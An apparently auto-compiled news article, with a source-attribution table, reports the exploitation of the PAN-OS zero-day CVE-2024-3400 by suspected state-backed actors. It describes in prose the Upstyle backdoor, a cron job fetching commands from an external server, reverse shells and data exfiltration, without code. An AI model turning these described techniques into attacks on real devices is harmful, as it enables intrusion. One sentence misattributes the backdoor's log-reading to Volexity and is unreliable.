By NewsBlogger State-sponsored hackers have been exploiting a zero-day vulnerability in Palo Alto Networks firewalls since March 26, prompting the issuance of a warning by the company and the expected release of patches on April 14.
At a glance
- Suspected state-sponsored hackers exploiting zero-day vulnerability in Palo Alto Networks firewalls since March 26
- Patches for the vulnerability expected to be available on April 14
- Volexity discovered the zero-day flaw and provided details on the exploitation
- Threat actors deploying additional payloads to start reverse shells and exfiltrate data
- US agencies required to apply patches by April 19 to mitigate potential threats
The details
Suspected state-sponsored hackers have been exploiting a zero-day vulnerability in Palo Alto Networks firewalls tracked as CVE-2024-3400 since March 26.
Palo Alto Networks issued a warning that hackers were actively exploiting an unauthenticated remote code execution vulnerability in its PAN-OS firewall software.
Patches for the vulnerability are expected to be available on April 14.
Volexity Discovery
Volexity, a cybersecurity firm, discovered the zero-day flaw and provided more details on how hackers exploited the vulnerability.
They are tracking the malicious activity under the moniker UTA0218 and believe it is highly likely that state-sponsored threat actors are conducting the attacks.
The zero-day exploitation was first detected on April 10, 2024, within the GlobalProtect feature of Palo Alto Networks PAN-OS.
The threat actors have been exploiting the CVE-2024-3400 zero-day since at least March 26. One of the installed payloads is a custom implant named ‘Upstyle’ designed specifically for PAN-OS to act as a backdoor.
This backdoor is installed through a Python script that creates a path configuration file at ‘/usr/lib/python3.6/site-packages/system.pth’. Volexity states that they will monitor the web server’s access logs to extract base64 commands to execute.
Attack Details
Volexity observed the threat actors deploying additional payloads to start reverse shells, exfiltrate PAN-OS configuration data, remove log files, and deploy the Golang tunneling tool named GOST. In one of the breaches, the attackers pivoted to the internal network to steal sensitive Windows files.
They also stole Google Chrome and Microsoft Edge files on specific target devices.
No other payloads were deployed on these devices.
Volexity suggests two methods for detecting if a Palo Alto Networks firewall was compromised.
Edge network devices have become prime targets for threat actors to steal data and gain initial access to a network.
In related incidents, in March 2023, China-linked hackers were exploiting Fortinet zero-days to install a custom implant on devices.
In April 2023, the US and UK warned that the Russian state-sponsored APT28 hackers were deploying a custom malware named ‘Jaguar Tooth’ on Cisco IOS routers.
In May 2023, a Chinese state-sponsored hacking group was infecting TP-Link routers with custom malware.
Barracuda ESG devices were exploited for seven months to deploy custom malware and steal data.
On the other hand, threat actors have been exploiting a zero-day flaw in Palo Alto Networks PAN-OS software since March 26, 2024. The flaw is a command injection vulnerability that allows attackers to execute arbitrary code with root privileges.
It affects PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewall configurations with GlobalProtect gateway and device telemetry enabled.
The exploitation is tracked under Operation MidnightEclipse by Palo Alto Networks’ Unit 42 division.
Attackers create a cron job to fetch commands from an external server and execute them using the bash shell.
They manually manage an access control list for the command-and-control server.
The Python-based backdoor used in the attack is tracked as UPSTYLE by Volexity.
The backdoor writes and launches another Python script to execute the threat actor’s commands.
The attack chain uses legitimate files associated with the firewall to extract commands and write results.
The threat actor forges network requests to write commands to the web server error log, aiming to exfiltrate results within 15 seconds before the file is overwritten.
The threat actor has been observed creating a reverse shell, downloading additional tools, and exfiltrating data.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the flaw to its Known Exploited Vulnerabilities catalog.
Federal agencies are required to apply patches by April 19 to mitigate potential threats.
Palo Alto Networks is expected to release fixes for the flaw by April 14.
Volexity suggests that the threat actor UTA0218 is state-backed based on the resources and capabilities displayed.
Article X-ray
Sources
Here are all the sources used to create this article:
Facts attribution
This section links each of the article’s facts back to its original source.
If you suspect false information in the article, you can use this section to investigate where it came from.
| bleepingcomputer.com |
|---|
| – Suspected state-sponsored hackers have been exploiting a zero-day vulnerability in Palo Alto Networks firewalls tracked as CVE-2024-3400 since March 26 – Palo Alto Networks warned that hackers were actively exploiting an unauthenticated remote code execution vulnerability in its PAN-OS firewall software – Patches for the vulnerability would be available on April 14 – Volexity discovered the zero-day flaw and provided more details on how hackers exploited the vulnerability – Volexity is tracking the malicious activity under the moniker UTA0218 and believes it is highly likely that state-sponsored threat actors are conducting the attacks – Volexity first detected the zero-day exploitation on April 10, 2024, within the GlobalProtect feature of Palo Alto Networks PAN-OS – |
| The threat actors have been exploiting the CVE-2024-3400 zero-day since at least March 26 – One of the installed payloads is a custom implant named ‘Upstyle’ designed specifically for PAN-OS to act as a backdoor – The backdoor is installed through a Python script that creates a path configuration file at ‘/usr/lib/python3.6/site-packages/system.pth’ – The system.pth file is the Upstyle backdoor and Volexity says it will monitor the web server’s access logs to extract base64 commands to execute – Volexity observed the threat actors deploying additional payloads to start reverse shells, exfiltrate PAN-OS configuration data, remove log files, deploy the Golang tunneling tool named GOST – |
| In one of the breaches, Volexity observed the attackers pivoting to the internal network to steal sensitive Windows files – The threat actors stole Google Chrome and Microsoft Edge files on specific target’s devices – No other payloads were deployed on the devices – Volexity says two methods can be used to detect if a Palo Alto Networks firewall was compromised – Edge network devices have become prime targets for threat actors to steal data and gain initial access to a network – In March 2023, China-linked hackers were exploiting Fortinet zero-days to install a custom implant on devices – In April 2023, the US and UK warned that the Russian state-sponsored APT28 hackers were deploying a custom malware named ‘Jaguar Tooth’ on Cisco IOS routers – |
| In May 2023, a Chinese state-sponsored hacking group was infecting TP-Link routers with custom malware – Barracuda ESG devices were exploited for seven months to deploy custom malware and steal data |
| securityweek.com |
|---|
| – Threat actors have been exploiting a zero-day flaw in Palo Alto Networks PAN-OS software since March 26, 2024 – The flaw is a command injection vulnerability that allows attackers to execute arbitrary code with root privileges – The vulnerability affects PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewall configurations with GlobalProtect gateway and device telemetry enabled – |
| The exploitation is tracked under Operation MidnightEclipse by Palo Alto Networks’ Unit 42 division – |
| The attackers create a cron job to fetch commands from an external server and execute them using the bash shell – |
| The attackers manually manage an access control list for the command-and-control server – The Python-based backdoor used in the attack is tracked as UPSTYLE by Volexity – The backdoor writes and launches another Python script to execute the threat actor’s commands – |
| The attack chain uses legitimate files associated with the firewall to extract commands and write results – The threat actor forges network requests to write commands to the web server error log – |
| The goal is to exfiltrate results within 15 seconds before the file is overwritten – The threat actor has been observed creating a reverse shell, downloading additional tools, and exfiltrating data – The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the flaw to its Known Exploited Vulnerabilities catalog – Federal agencies are required to apply patches by April 19 to mitigate potential threats – Palo Alto Networks is expected to release fixes for the flaw by April 14 – Volexity suggests that the threat actor UTA0218 is state-backed based on the resources and capabilities displayed |
